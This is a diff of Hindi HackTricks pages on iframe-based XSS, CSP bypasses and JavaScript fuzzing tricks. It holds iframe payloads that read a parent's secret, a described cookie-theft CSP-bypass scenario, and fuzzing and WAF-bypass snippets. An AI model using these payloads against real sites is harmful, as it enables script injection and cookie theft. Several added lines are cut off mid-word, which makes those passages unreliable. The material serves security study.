* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें** हैकट्रिक्स रेपो (https://github.com/carlospolop/hacktricks) और **हैकट्रिक्स-क्लाउड रेपो** (https://github.com/carlospolop/hacktricks-cloud) को PR जमा करके
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **नवीनतम संस्करण को देखना चाहते हैं या पीईएएस को डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में पीआर जमा करके [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)
</details>

View file

@ -1,26 +1,26 @@
# XSS में आईफ्रेम, सीएसपी और एसओप
# Iframes में XSS, CSP और SOP
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को पीडीएफ में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके
</details>
## XSS में आईफ्रेम
## XSS में Iframes
एक आईफ्रेम पेज की सामग्री को दर्शाने के लिए 3 तरीके हैं:
एक iframed पेज की सामग्री को दर्शाने के लिए 3 तरीके हैं:
* `src` के माध्यम से एक URL को दर्शाते हुए (URL cross origin या same origin हो सकता है)
* `data:` प्रोटोकॉल का उपयोग करके सामग्री को दर्शाते हुए `src` के माध्यम से
* `srcdoc` के माध्यम से सामग्री को दर्शाते हुए
* `src` के माध्यम से URL को दर्शाना (URL cross origin या same origin हो सकता है)
* `data:` प्रोटोकॉल का उपयोग करके सामग्री को दर्शाना
* `srcdoc` के माध्यम से सामग्री को दर्शाना
**माता और बालक के वेरिएबल्स तक पहुंचना**
**Parent & Child vars तक पहुंचना**
```html
<html>
<script>
@ -51,17 +51,17 @@ var secret="child secret";
alert(parent.secret)
</script>
```
यदि आप पिछले html तक http सर्वर के माध्यम से एक्सेस करते हैं (जैसे `python3 -m http.server`) तो आप देखेंगे कि सभी स्क्रिप्ट्स क्रियान्वित हो जाएंगे (क्योंकि इसे रोकने वाला कोई CSP नहीं है)। **माता-पिता आईफ्रेम के भीतर `secret` वेरिएबल तक पहुंच नहीं पाएंगे** और **केवल आफ्रेम if2 और if3 (जो सेम-साइट माने जाते हैं) मूल विंडो में गुप्त तक पहुंच सकते हैं**।\
ध्यान दें कि if4 को `null` मूल माना जाता है।
यदि आप पिछले html तक http सर्वर के माध्यम से पहुंचते हैं (जैसे `python3 -m http.server`) तो आप देखेंगे कि सभी स्क्रिप्ट्स क्रियान्वित होंगे (क्योंकि इसे रोकने वाला कोई CSP नहीं है)। **माता-पिता किसी भी आइफ्रेम के अंदर `secret` वेरिएबल तक पहुंच नहीं पाएंगे** और **केवल आफ्रेम if2 और if3 (जो सेम-साइट माने जाते हैं) मूल विंडो में सीक्रेट तक पहुंच सकते हैं**।
नोट करें कि if4 को `null` मूल माना जाता है।
### CSP के साथ आफ्रेम <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
### CSP के साथ आफ्रेम <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
{% hint style="info" %}
कृपया ध्यान दें कि निम्नलिखित बायपास में जबाब आईफ्रेम पेज को कोई भी CSP हेडर नहीं है जो JS क्रियान्वयन को रोकता है।
कृपया ध्यान दें कि निम्नलिखित बायपास में जबाब देने वाले पेज का उत्तर कोई भी CSP हेडर नहीं है जो JS क्रियान्वयन को रोकता है।
{% endhint %}
`script-src` का `self` मान जीएस कोड का क्रियान्वयन `data:` प्रोटोकॉल या `srcdoc` विशेषता का उपयोग करके नहीं करने देगा।\
हालांकि, CSP का `none` मान भी उन आफ्रेम का क्रियान्वयन करने देगा जो `src` विशेषता में एक URL (पूरा या केवल पथ) डालते हैं।\
हालांकि, CSP का `none` मान भी उन आफ्रेम का क्रियान्वयन करने देगा जो `src` विशेषता में URL (पूरा या केवल पथ) डालते हैं।\
इसलिए एक पृष्ठ का CSP बायपास करना संभव है:
```html
<html>
@ -77,14 +77,14 @@ var secret = "31337s3cr37t";
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
</html>
```
नोट करें कि **पिछला सीएसपी केवल इनलाइन स्क्रिप्ट का निषेध करता है**।\
नोट करें कि **पिछला CSP केवल इनलाइन स्क्रिप्ट का निषेध करता है**।\
हालांकि, **केवल `if1` और `if2` स्क्रिप्ट को चलाया जाएगा लेकिन केवल `if1` माता सीक्रेट तक पहुंच सकेगा**
![](<../../.gitbook/assets/image (627) (1) (1).png>)
इसलिए, यदि आप सर्वर पर एक JS फ़ाइल अपलोड कर सकते हैं और इसे आईफ्रेम के माध्यम से लोड कर सकते हैं, तो **एक सीएसपी को छलकर सकते हैं भले ही `script-src 'none'` हो**। यह **समान-स्थल JSONP एंडपॉइंट का दुरुपयोग करके भी संभव है**।
इसलिए, यदि आप सर्वर पर एक JS फ़ाइल अपलोड कर सकते हैं और इसे आईफ्रेम के माध्यम से लोड कर सकते हैं, तो **एक CSP को छलना संभव है, भले ही `script-src 'none'` हो**। यह **संभावित रूप से एक समान-स्थान JSONP एंडपॉइंट का दुरुपयोग करके भी किया जा सकता है**।
आप इसे निम्नलिखित परिदृश्य के साथ परीक्षण कर सकते हैं जहां एक कुकी चोरी की जाती है भले ही `script-src 'none'` हो। बस एप्लिकेशन को चलाएं और अपने ब्राउज़र के साथ इसका उपयोग करें:
आप इसे निम्नलिखित परिदृश्य के साथ परीक्षण कर सकते हैं जहां एक कुकी चोरी की जाती है, भले ही `script-src 'none'` हो। बस एप्लिकेशन को चलाएं और अपने ब्राउज़र के साथ इसका उपयोग करें:
```python
import flask
from flask import Flask
@ -117,22 +117,22 @@ app.run()
आईफ्रेम के भीतर की सामग्री को `sandbox` विशेषता का उपयोग करके अतिरिक्त प्रतिबंधों के लिए विचाराधीन किया जा सकता है। डिफ़ॉल्ट रूप से, इस विशेषता का उपयोग नहीं होता है, जिसका मतलब है कि कोई प्रतिबंध नहीं हैं।
जब इस्तेमाल किया जाता है, `sandbox` विशेषता कई प्रतिबंध लागू करती हैं:
जब इस्तेमाल किया जाता है, `sandbox` विशेषता कई प्रतिबंध लगाती हैं:
- सामग्री को एक अद्वितीय स्रोत से उत्पन्न माना जाता है।
- किसी भी प्रपत्र को सबमिट करने का प्रयास रोका जाता है।
- किसी भी प्रपत्रों को सबमिट करने का प्रयास रोका जाता है।
- स्क्रिप्ट का क्रियान्वयन निषिद्ध है।
- कुछ एपीआई तक पहुंच बंद है।
- यह लिंक को अन्य ब्राउज़िंग संदर्भों के साथ बातचीत करने से रोकता है।
- `<embed>`, `<object>`, `<applet>` या समान टैग के माध्यम से प्लगइन का उपयोग अनुमति नहीं है।
- सामग्री के शीर्ष-स्तर ब्राउज़िंग संदर्भ की संदर्भीकरण को रोका जाता है।
- वीडियो प्लेबैक या प्रपत्र नियंत्रणों के स्वत: ट्रिगर होने वाले विशेषताएं रोकी जाती हैं
- वीडियो प्लेबैक या फॉर्म नियंत्रणों का स्वत: ट्रिगर होना, जैसे कि वीडियो प्लेबैक या फॉर्म नियंत्रणों का स्वत: ट्रिगर होना, रोका जाता है
विशेषता का मान खाली छोड़ा जा सकता है (`sandbox=""`) ताकि सभी पूर्ववर्णित प्रतिबंध लागू हों। वैकल्पिक रूप से, इसे कुछ विशेष मानों की एक अंतरिक्ष से आईफ्रेम को छुट्टी देने वाली सभी प्रतिबंधों से मुक्त करने के लिए एक अंतरिक्ष में स्थानांतरित सूची में सेट किया जा सकता है।
विशेषता का मान खाली छोड़ा जा सकता है (`sandbox=""`) ताकि सभी पूर्ववर्णित प्रतिबंध लागू हों। वैकल्पिक रूप से, इसे विशेष लाभों से आईफ्रेम को छुट्टी देने वाले विशेष मूल्यों की एक अंतरिक्ष-विभाजित सूची में सेट किया जा सकता है।
```html
<iframe src="demo_iframe_sandbox.htm" sandbox></iframe>
```
## Iframes में SOP
## Iframes in SOP
निम्नलिखित पृष्ठों की जाँच करें:
@ -156,10 +156,10 @@ app.run()
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**.
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **नवीनतम संस्करण को पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
</details>

View file

@ -1,20 +1,20 @@
# विविध जेएस ट्रिक्स और संबंधित जानकारी
# अन्य JS ट्रिक्स और संबंधित जानकारी
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को पीडीएफ में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपनी हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को PR जमा करके**
</details>
## जावास्क्रिप्ट फजिंग
### मान्य जेएस टिप्पणी वर्ण
### मान्य JS टिप्पणी वर्ण
```javascript
//This is a 1 line comment
/* This is a multiline comment*/
@ -65,16 +65,7 @@ log.push([i,j])
}
console.log(log)//[35,33],[47,47]
```
### मान्य जेएस नए लाइन वर्ण
जेएस कोड में नई पंक्तियों को दर्शाने के लिए निम्नलिखित वर्ण प्रयोग किए जा सकते हैं:
- `\n` - नई पंक्ति वर्ण
- `\r` - कैरिज रिटर्न वर्ण
- `\u2028` - लाइन सेपरेटर वर्ण
- `\u2029` - पैराग्राफ सेपरेटर वर्ण
इन वर्णों का उपयोग करके, आप जेएस कोड में नई पंक्तियों को शामिल कर सकते हैं और इसे अधिक पठनीय बना सकते हैं।
### मान्य JS नए लाइन चर
```javascript
//Javascript interpret as new line these chars:
String.fromCharCode(10) //0x0a
@ -96,20 +87,7 @@ console.log(`[${err}]`,j,cmd);
}
//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
```
### फंक्शन कॉल में मान्य जेएस स्थान
In JavaScript, function calls can be made using various techniques. One such technique is using valid JS spaces within the function call. This can be done by inserting spaces between the function name and the opening parenthesis, as well as between the closing parenthesis and the semicolon.
For example:
```javascript
alert ('Hello, world!');
```
In the above code, the function `alert` is called with a space between the function name and the opening parenthesis. This is a valid JS space and the function will be executed without any errors.
This technique can be useful in certain scenarios where the application filters out specific characters or keywords but allows spaces. By using valid JS spaces, an attacker can bypass such filters and inject malicious code into the application.
It is important to note that this technique should only be used for educational purposes and with proper authorization. Unauthorized use of this technique can lead to legal consequences.
### फ़ंक्शन कॉल में वैध JS जगह
```javascript
// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 40-41). Kindle Edition.
@ -126,7 +104,7 @@ log.push(i)
console.log(log)v//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,813 232,8233,8239,8287,12288,65279
```
### **स्ट्रिंग उत्पन्न करने के लिए मान्य वर्ण**
### **स्ट्रिंग जेनरेट करने के लिए वैध वर्ण**
```javascript
// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 41-42). Kindle Edition.
@ -143,7 +121,7 @@ console.log(log) //34,39,47,96
```
### **सरोगेट पेयर्स बीएफ**
यह तकनीक XSS के लिए बहुत उपयोगी नहीं होगी, लेकिन यह WAF संरक्षण को दुर्गम करने के लिए उपयोगी हो सकती है। इस पायथन कोड को दो बाइट के रूप में इनपुट मिलता है और यह उच्च सरोगेट पेयर के अंतिम बाइट के रूप में पहले बाइट और निम्न सरोगेट पेयर के अंतिम बाइट के रूप में अंतिम बाइट रखता है।
यह तकनीक XSS के लिए बहुत उपयोगी नहीं होगी लेकिन यह WAF सुरक्षा को उम्मीद से पार करने में मददगार हो सकती है। यह पायथन कोड 2 बाइट के रूप में इनपुट प्राप्त करता है और यह उस सरोगेट पेयर की खोज करता है जिसमें पहला बाइट हाई सरोगेट पेयर के अंतिम बाइट के रूप में होता है और अंतिम बाइट लो सरोगेट पेयर के अंतिम बाइट के रूप में होता है।
```python
def unicode(findHex):
for i in range(0,0xFFFFF):
@ -182,11 +160,7 @@ document.body.append(anchor)
// Another way to test
<a href="&#12;javascript:alert(1337)">Test</a>
```
### URL फज़िलता
URL फज़िलता एक वेब अनुप्रयोग को परीक्षण करने का एक तकनीक है जिसमें विभिन्न URL पैरामीटरों को अनुमानित मानों के साथ प्रयोग किया जाता है। इसका उपयोग वेब अनुप्रयोगों में संभावित सुरक्षा दुरुपयोगों की खोज करने के लिए किया जाता है। यह तकनीक एक अनुप्रयोग के विभिन्न भागों को परीक्षण करने के लिए उपयोगी हो सकती है, जैसे कि पैरामीटर, पथ, हेडर, कुकीज़, यूआरएल शीर्षक आदि।
यह तकनीक एक अनुप्रयोग के विभिन्न भागों को परीक्षण करने के लिए उपयोगी हो सकती है, जैसे कि पैरामीटर, पथ, हेडर, कुकीज़, यूआरएल शीर्षक आदि। यह तकनीक एक अनुप्रयोग के विभिन्न भागों को परीक्षण करने के लिए उपयोगी हो सकती है, जैसे कि पैरामीटर, पथ, हेडर, कुकीज़, यूआरएल शीर्षक आदि।
### URL फज़िंग
```javascript
// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 36-37). Kindle Edition.
@ -212,15 +186,7 @@ log.push(i);
}
console.log(log) //9,10,13,47,92
```
### HTML फज़िलता
HTML फज़िलता एक टेक्निक है जिसका उपयोग क्रॉस-साइट स्क्रिप्टिंग (XSS) अटैक के लिए किया जाता है। इस तकनीक में, हम विभिन्न HTML टैग और उनके विशेषताओं को अनुकरण करके वेब ऐप्लिकेशन को टेस्ट करते हैं। यह हमें उन टैगों और विशेषताओं की पहचान करने में मदद करता है जिनका उपयोग XSS अटैक के लिए किया जा सकता है।
इस तकनीक का उपयोग करने के लिए, हम विभिन्न HTML टैगों को वेब ऐप्लिकेशन में इंजेक्ट करते हैं और उनका उत्पादन देखते हैं। यदि ऐप्लिकेशन ने इंजेक्टेड टैग को सही ढंग से प्रोसेस किया है, तो उसका उत्पादन ठीक होगा। लेकिन, यदि ऐप्लिकेशन ने इंजेक्टेड टैग को गलत ढंग से प्रोसेस किया है, तो वह XSS अटैक के लिए उपयोगी हो सकता है।
इस तकनीक का उपयोग करने के लिए, हम विभिन्न HTML टैगों को इंजेक्ट करने के लिए विभिन्न तरीकों का उपयोग कर सकते हैं, जैसे कि टैगों को इंजेक्ट करने के लिए इनपुट फ़ील्ड, URL पैरामीटर, या कुकीज़ का उपयोग करना। इसके अलावा, हम विभिन्न विशेषताओं को भी इंजेक्ट कर सकते हैं, जैसे कि इवेंट हैंडलर, स्टाइल आवेदन, या अन्य एट्रिब्यूट्स।
इस तकनीक का उपयोग करके, हम XSS अटैक के लिए उपयोगी टैग और विशेषताओं की पहचान कर सकते हैं और उन्हें एक्सप्लोइट करने के लिए उपयोग कर सकते हैं।
### HTML फज़िंग
```javascript
// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 38). Kindle Edition.
@ -236,29 +202,9 @@ log.push(i);
}
console.log(log)//33,45,62
```
## **विश्लेषण गुणों का विश्लेषण**
## **विश्लेषण गुण**
पोर्टस्विगर के टूल **हैकबिलिटी इंस्पेक्टर** जावास्क्रिप्ट ऑब्जेक्ट के **गुणों का विश्लेषण करने** में मदद करता है। जांचें: [https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E](https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E)
## **.map js फ़ाइलें**
* .map js फ़ाइलें डाउनलोड करने के लिए ट्रिक: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7)
* आप इन फ़ाइलों का विश्लेषण करने के लिए इस टूल का उपयोग कर सकते हैं [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji)
## "--" असाइनमेंट
डिक्रीमेंट ऑपरेटर `--` भी एक असाइनमेंट है। यह ऑपरेटर एक मान लेता है और उसे एक के रूप में कम कर देता है। यदि वह मान एक नंबर नहीं है, तो यह `NaN` पर सेट किया जाएगा। इसका उपयोग करके **पर्यावरण से चरों की सामग्री को हटाने** के लिए किया जा सकता है।
![](<../../.gitbook/assets/image (553).png>)
![](<../../.gitbook/assets/image (554).png>)
## फ़ंक्शन ट्रिक्स
### .call और .apply
एक फ़ंक्शन का **`.call`** मेथड फ़ंक्शन को **चलाने** के लिए उपयोग किया जाता है।\
यह **पहला तर्क** डिफ़ॉल्ट रूप से **`this` के मान** की उम्मीद करता है और अगर **कुछ नहीं** प्रदान किया गया है, तो **`window`** उस मान की होगी (यहां तक कि **`strict mode`** का उपयोग नहीं हो रहा है)।
टूल **Hackability inspector** from Portswigger मदद करता है **विश्लेषण** करने में एक javascript ऑब्ज
```javascript
function test_call(){
console.log(this.value); //baz
@ -289,9 +235,9 @@ console.log(this); //[object Window]
}
test_apply.apply(null, ["arg1", "arg2"])
```
### एरो फंक्शन्स
### ऐरो फंक्शन
एरो फंक्शन्स आपको एक ही लाइन में आसानी से फंक्शन बनाने की अनुमति देते हैं (यदि आप उन्हें समझते हैं)
ऐरो फंक्शन आपको एक ही लाइन में फंक्शन उत्पन्न करने की अधिक सुविधा प्रदान करते हैं (अगर आप उन्हें समझते हैं)
```javascript
// Traditional
function (a){ return a + 1; }
@ -314,7 +260,7 @@ let a = 4;
let b = 2;
() => a + b + 1;
```
तो, पिछले अधिकांश फ़ंक्शन वास्तव में अनर्थक है क्योंकि हम उन्हें कहीं नहीं सहेज रहे हैं ताकि हम उन्हें सहेजें और उन्हें कॉल करें। उदाहरण के रूप में `plusone` फ़ंक्शन बनाना:
इसलिए, पिछले फ़ंक्शन का अधिकांश वास्तव में अनर्थक है क्योंकि हम उन्हें कहीं सहेजने और उन्हें बुलाने के लिए नहीं बचा रहे हैं। उदाहरण के रूप में `plusone` फ़ंक्शन बनाना:
```javascript
// Traductional
function plusone (a){ return a + 1; }
@ -324,7 +270,7 @@ plusone = a => a + 100;
```
### बाइंड फंक्शन
बाइंड फंक्शन का उपयोग करके हम एक **कॉपी** बना सकते हैं एक **फंक्शन को संशोधित करके** **`this`** ऑब्जेक्ट और दिए गए **पैरामीटर** को।
बाइंड फंक्शन क**कॉपी बनाने** की अनुमति देती है जो **`this`** ऑब्ज
```javascript
//This will use the this object and print "Hello World"
var fn = function ( param1, param2 ) {
@ -349,12 +295,7 @@ var bindFn_this = fn.bind(this, "fixingparam1");
bindFn_change('Hello', 'World')
```
{% hint style="info" %}
ध्यान दें कि **`bind`** का उपयोग करके आप उस वस्तु को बदल सकते हैं जो कि फ़ंक्शन को कॉल करते समय उपयोग होगी।
{% endhint %}
### फ़ंक्शन कोड लीक
यदि आप एक फ़ंक्शन के ऑब्जेक्ट तक पहुंच सकते हैं तो आप उस फ़ंक्शन के कोड को प्राप्त कर सकते हैं।
ध्यान दें कि **`bind`** का उपयोग करके आप **`this`** ऑब्ज
```javascript
function afunc(){
return 1+1;
@ -364,12 +305,12 @@ console.log(String(afunc)); //This will print the code of the function
console.log(this.afunc.toString()); //This will print the code of the function
console.log(global.afunc.toString()); //This will print the code of the function
```
ऐसे मामलों में जहां **फ़ंक्शन का कोई नाम नहीं होता है**, आप अभी भी **फ़ंक्शन कोड** को अंदर से प्रिंट कर सकते हैं:
उन मामलों में जहां **फ़ंक्शन का कोई नाम नहीं है**, आप फिर भी **फ़ंक्शन कोड** को अंदर से प्रिंट कर सकते हैं:
```javascript
(function (){ return arguments.callee.toString(); })()
(function (){ return arguments[0]; })("arg0")
```
िसी अन्य फ़ंक्शन से एक फ़ंक्शन के कोड (हमेशा की तरह टिप्पणियाँ सहित) को निकालने के लिए कुछ **यादृच्छिक** तरीके:
ुछ **यादृच्छिक** तरीके **कोड** को एक फंक्शन से निकालने के लिए (यहाँ तक की टिप्पणियाँ भी):
```javascript
(function (){ return retFunc => String(arguments[0]) })(a=>{/* Hidden commment */})()
(function (){ return retFunc => Array(arguments[0].toString()) })(a=>{/* Hidden commment */})()
@ -377,11 +318,7 @@ console.log(global.afunc.toString()); //This will print the code of the function
(u=>(String(u)))(_=>{ /* Hidden commment */ })
